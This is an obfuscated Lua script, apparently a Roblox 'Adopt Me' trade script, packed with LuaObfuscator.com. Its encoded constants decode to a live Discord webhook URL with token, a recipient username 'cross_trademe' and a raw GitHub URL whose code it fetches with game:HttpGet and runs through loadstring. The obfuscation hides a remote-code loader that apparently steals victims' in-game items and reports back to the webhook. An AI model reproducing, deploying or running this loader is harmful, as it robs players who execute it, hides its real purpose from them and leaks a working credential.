--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v88=0;while true do if (v88==0) then v19=v0(v3(v30,1,1));return "";end end else local v89=v2(v0(v30,16));if v19 then local v117=0;local v118;while true do if (v117==1) then return v118;end if (0==v117) then v118=v5(v89,v19);v19=nil;v117=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=0;local v91;while true do if (v90==(0 -0)) then v91=(v31/((5 -3)^(v32-(1 -0))))%(2^(((v33-(1 + 0)) -(v32-(2 -(878 -(282 + 595))))) + (620 -(555 + 64)))) ;return v91-(v91%((2569 -(1523 + 114)) -(857 + 74))) ;end end else local v92=(570 -(367 + 201))^(v32-((834 + 94) -((304 -90) + 713))) ;return (((v31%(v92 + v92))>=v92) and 1) or (0 + 0) ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(32 + 85) ;end if (v34==(1 + 0 + (957 -(892 + 65)))) then return v35;end end end local function v22() local v36=0 -(0 -0) ;local v37;local v38;while true do if (v36==1) then return (v38 * (472 -216)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;v36=1 + 0 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) + 0 );v18=v18 + (15 -11) ;return (v42 * (16778168 -(802 + 150))) + (v41 * (176444 -110908)) + (v40 * 256) + v39 ;end local function v24() local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==((586 + 412) -(915 + 82))) then v46=2 -1 ;v47=(v20(v45,1,20) * (2^(16 + 3 + (47 -34)))) + v44 ;v43=774 -(201 + 571) ;end if (v43==((7 -5) -0)) then v48=v20(v45,1208 -(1069 + 118) ,31);v49=((v20(v45,(931 -(814 + 45)) -40 )==(1 -0)) and  -(1 + 0)) or 1 ;v43=4 -1 ;end if (v43==(3 + 0)) then if (v48==((1948 -1157) -(368 + 423))) then if (v47==((0 + 0) -0)) then return v49 * ((7 + 11) -(10 + 8)) ;else v48=3 -2 ;v46=442 -(416 + 26) ;end elseif (v48==((7420 -(261 + 624)) -4488)) then return ((v47==(0 + (0 -0))) and (v49 * ((1 -0)/(438 -((1283 -(116 + 1022)) + 293))))) or (v49 * NaN) ;end return v8(v49,v48-(1453 -(44 + 386)) ) * (v46 + (v47/(2^(1538 -((2078 -(1020 + 60)) + 488))))) ;end if (v43==0) then v44=v23();v45=v23();v43=(4 -3) + 0 ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(1423 -(630 + 793))) then return "";end end v51=v3(v16,v18,(v18 + v50) -(3 -2) );v18=v18 + v50 ;local v52={};for v69=4 -3 , #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0 + 0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v93~= #",") then else if (v94== #"\\") then v95=(function() return v96()~=(561 -(79 + 482)) ;end)();elseif (v94==(605 -(268 + 335))) then v95=(function() return v97();end)();elseif (v94== #"19(") then v95=(function() return v98();end)();end v99[v100]=(function() return v95;end)();break;end if (v93==(290 -(60 + 230))) then local v124=(function() return 0;end)();local v125=(function() return;end)();while true do if (v124~=(0 -0)) then else v125=(function() return 0;end)();while true do if (v125~=0) then else v94=(function() return v96();end)();v95=(function() return nil;end)();v125=(function() return 2 -1 ;end)();end if (v125==(286 -(134 + 151))) then v93=(function() return  #"]";end)();break;end end break;end end end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v54=(function() return function(v101,v102,v103,v104,v105,v106,v107,v108,v109) local v110=(function() return 0 + 0 ;end)();local v101=(function() return;end)();local v102=(function() return;end)();while true do if (v110==(1666 -(970 + 695))) then local v126=(function() return 0 -0 ;end)();while true do if (v126==(1990 -(582 + 1408))) then while true do if (v101~=(0 -0)) then else v102=(function() return v103();end)();if (v104(v102, #",", #">")~=(0 + 0)) then else local v133=(function() return 0;end)();local v134=(function() return;end)();local v135=(function() return;end)();local v136=(function() return;end)();while true do if ((1026 -(706 + 318))==v133) then if (v104(v135, #"<", #" ")~= #"]") then else v136[2 -0 ]=(function() return v107[v136[7 -5 ]];end)();end if (v104(v135,2,1826 -(1195 + 629) )~= #"}") then else v136[ #"nil"]=(function() return v107[v136[ #"91("]];end)();end v133=(function() return 3 + 0 ;end)();end if (v133==3) then if (v104(v135, #"xnx", #"-19")== #" ") then v136[ #".com"]=(function() return v107[v136[ #"http"]];end)();end v108[v109]=(function() return v136;end)();break;end if ((1 -0)==v133) then local v178=(function() return 0;end)();local v179=(function() return;end)();while true do if ((241 -(187 + 54))~=v178) then else v179=(function() return 780 -(162 + 618) ;end)();while true do if (v179==(1 + 0)) then v133=(function() return 2 + 0 ;end)();break;end if ((0 -0)~=v179) then else local v198=(function() return 0;end)();while true do if (v198~=(0 + 0)) then else v136=(function() return {v105(),v105(),nil,nil};end)();if (v134==(0 -0)) then local v199=(function() return 1500 -(1408 + 92) ;end)();local v200=(function() return;end)();while true do if ((0 + 0)==v199) then v200=(function() return 1288 -(993 + 295) ;end)();while true do if (v200==0) then v136[ #"-19"]=(function() return v105();end)();v136[ #".com"]=(function() return v105();end)();break;end end break;end end elseif (v134== #" ") then v136[ #"-19"]=(function() return v106();end)();elseif (v134==(1638 -(1373 + 263))) then v136[ #"xxx"]=(function() return v106() -((1002 -(451 + 549))^16) ;end)();elseif (v134~= #"91(") then else local v205=(function() return 0 + 0 ;end)();local v206=(function() return;end)();while true do if (v205~=0) then else v206=(function() return 0 -0 ;end)();while true do if (v206==(0 -0)) then v136[ #"-19"]=(function() return v106() -(2^16) ;end)();v136[ #"asd1"]=(function() return v105();end)();break;end end break;end end end v198=(function() return 1385 -(746 + 638) ;end)();end if (v198==1) then v179=(function() return 1 + 0 ;end)();break;end end end end break;end end end if (v133==(0 + 0)) then local v180=(function() return 0 -0 ;end)();while true do if (v180==0) then v134=(function() return v104(v102,1 + 1 , #"nil");end)();v135=(function() return v104(v102, #"0836",6);end)();v180=(function() return 342 -(218 + 123) ;end)();end if (v180~=(1582 -(1535 + 46))) then else v133=(function() return 1770 -(1749 + 20) ;end)();break;end end end end end break;end end return v101,v102,v103,v104,v105,v106,v107,v108,v109;end end end if (v110~=(0 + 0)) then else local v127=(function() return 0 + 0 ;end)();while true do if (v127==(1322 -(1249 + 73))) then v101=(function() return 0 + 0 ;end)();v102=(function() return nil;end)();v127=(function() return 561 -(306 + 254) ;end)();end if (v127==(1146 -(466 + 679))) then v110=(function() return 1;end)();break;end end end end end;end)();local v55=(function() return function(v111,v112,v113) local v114=(function() return 0 -0 ;end)();while true do if (v114==0) then local v128=(function() return 0 -0 ;end)();local v129=(function() return;end)();while true do if ((0 + 0)~=v128) then else v129=(function() return 0;end)();while true do if (0==v129) then local v132=(function() return 0 -0 ;end)();while true do if (v132~=(0 + 0)) then else v111[v112-#"<" ]=(function() return v113();end)();return v111,v112,v113;end end end end break;end end end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #"{",v60 do FlatIdent_7126A,Type,Cons,v21,v24,v25,v61,v71=(function() return v53(FlatIdent_7126A,Type,Cons,v21,v24,v25,v61,v71);end)();end v59[ #"19("]=(function() return v21();end)();for v72= #",",v23() do FlatIdent_2661B,Descriptor,v21,v20,v22,v23,v61,v56,v72=(function() return v54(FlatIdent_2661B,Descriptor,v21,v20,v22,v23,v61,v56,v72);end)();end for v73= #":",v23() do v57,v73,v28=(function() return v55(v57,v73,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1];local v67=v63[5 -3 ];local v68=v63[3];return function(...) local v74=v66;local v75=v67;local v76=v68;local v77=v27;local v78=2 -1 ;local v79= -(115 -(4 + 110));local v80={};local v81={...};local v82=v12("#",...) -(1428 -((54 -13) + 1386)) ;local v83={};local v84={};for v115=103 -(17 + 86) ,v82 do if (v115>=v76) then v80[v115-v76 ]=v81[v115 + 1 + 0 ];else v84[v115]=v81[v115 + (1 -0) ];end end local v85=(v82-v76) + (1581 -(1183 + 397)) ;local v86;local v87;while true do local v116=0 -0 ;while true do if (v116==0) then v86=v74[v78];v87=v86[(932 -(468 + 297)) -(122 + 44) ];v116=1 -0 ;end if ((v116==1) or (4458<=1720)) then if ((v87<=(7 + 2)) or (436>3021)) then if (v87<=((574 -(334 + 228)) -8)) then if (v87<=((3 -2) + 0)) then if (v87>(0 + 0)) then if ((713<=847) and (v84[v86[3 -1 ]]==v86[69 -(30 + (81 -46)) ])) then v78=v78 + 1 + (0 -0) ;else v78=v86[1260 -(297 + 746 + 214) ];end else v65[v86[11 -8 ]]=v84[v86[1214 -(323 + 889) ]];end elseif (v87<=(1935 -(565 + 1368))) then local v139=v86[5 -(239 -(141 + 95)) ];local v140,v141=v77(v84[v139](v13(v84,v139 + (1662 -(1477 + 184)) ,v86[583 -(361 + 219) ])));v79=(v141 + v139) -(321 -(53 + 267)) ;local v142=856 -(564 + 292) ;for v161=v139,v79 do local v162=0 + 0 ;while true do if (v162==(413 -(15 + 391 + 7))) then v142=v142 + (983 -(18 + 964)) ;v84[v161]=v140[v142];break;end end end elseif (v87==(3 + 0)) then local v164=(0 -0) -0 ;local v165;while true do if (v164==(0 + 0)) then v165=v86[(4 -2) + 0 ];v84[v165]=v84[v165](v13(v84,v165 + (851 -(20 + 830)) ,v79));break;end end else v84[v86[(235 + 768) -(938 + (172 -109)) ]]=v65[v86[3 + 0 ]];end elseif (v87<=(4 + 1 + 1)) then if (v87==(131 -(116 + 10))) then v78=v86[3];else local v144=1613 -(1565 + 48) ;local v145;local v146;local v147;local v148;while true do if (v144==(2 + 0)) then for v189=v145,v79 do local v190=0 + 0 + 0 ;while true do if ((738 -(542 + 196))==v190) then v148=v148 + 1 ;v84[v189]=v146[v148];break;end end end break;end if ((2154<=4031) and (v144==(2 -(1 -0)))) then v79=(v147 + v145) -((1 + 0) -0) ;v148=(163 -(92 + 71)) -0 ;v144=1 + 1 ;end if (v144==(0 + 0 + 0)) then v145=v86[1 + 1 ];v146,v147=v77(v84[v145](v13(v84,v145 + ((2 -0) -1) ,v86[7 -4 ])));v144=1552 -(1126 + 425) ;end end end elseif (v87<=(23 -16)) then if (v84[v86[407 -(118 + 287) ]]==v86[15 -(776 -(574 + 191)) ]) then v78=v78 + (1122 -(118 + 1003)) ;else v78=v86[8 -5 ];end elseif (v87==(385 -(118 + 24 + 235))) then v84[v86[9 -7 ]]=v86[1 + 2 ];else local v171=v86[979 -(553 + 424) ];v84[v171]=v84[v171](v13(v84,v171 + (1 -0) ,v79));end elseif (v87<=(13 + 1)) then if (v87<=11) then if (v87>(10 + 0)) then local v149=v86[2 + 0 ];local v150=v84[v86[3]];v84[v149 + (2 -1) + 0 ]=v150;v84[v149]=v150[v86[3 + 1 ]];else v84[v86[613 -(602 + 9) ]]=v86[1192 -(230 + 219 + (1589 -(254 + 595))) ];end elseif ((4615==4615) and (v87<=(25 -13))) then do return;end elseif (v87==(960 -(245 + 702))) then v84[v86[5 -3 ]]();else v84[v86[4 -(128 -(55 + 71)) ]]=v65[v86[1 + 2 ]];end elseif (v87<=(77 -61)) then if ((v87>(455 -(382 + 58))) or (3790==500)) then do return;end else v78=v86[(995 -239) -((2029 -(573 + 1217)) + 514) ];end elseif (v87<=(6 + 11)) then local v157=1329 -(797 + 532) ;local v158;local v159;while true do if ((89<221) and (v157==(1 + 0))) then v84[v158 + 1 + (0 -0) ]=v159;v84[v158]=v159[v86[9 -5 ]];break;end if ((2054>=1421) and ((1202 -(373 + 829))==v157)) then v158=v86[733 -(37 + 439 + (410 -155)) ];v159=v84[v86[1133 -((1308 -(714 + 225)) + (2223 -1462)) ]];v157=1 + 0 ;end end elseif ((692<3058) and (v87>(232 -(22 + 192)))) then v84[v86[2 -0 ]]();else v65[v86[5 -2 ]]=v84[v86[240 -(64 + 174) ]];end v78=v78 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403433Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F41646F70744D652F6D61696E2F74726164652E6C756103083Q00557365724E616D65030D3Q0063726F2Q735F74726164656D6503073Q00576562482Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31323931323935382Q323537303435393138392F4C6F6738347A755F34516E76613765414958476F6B6A5F2Q704155687358714C6C41735A477273373478396A67793743716B6D3934414C394C476D4B58435370424B714900143Q0012083Q00013Q0026073Q000B0001000200040F3Q000B000100120E000100033Q00120E000200043Q002011000200020005001208000400064Q0002000200044Q000300013Q00022Q001300010001000100040F3Q001300010026073Q00010001000100040F3Q00010001001208000100083Q00122Q000100073Q0012080001000A3Q00122Q000100093Q0012083Q00023Q00040F3Q000100012Q00103Q00017Q00",v9(),...);
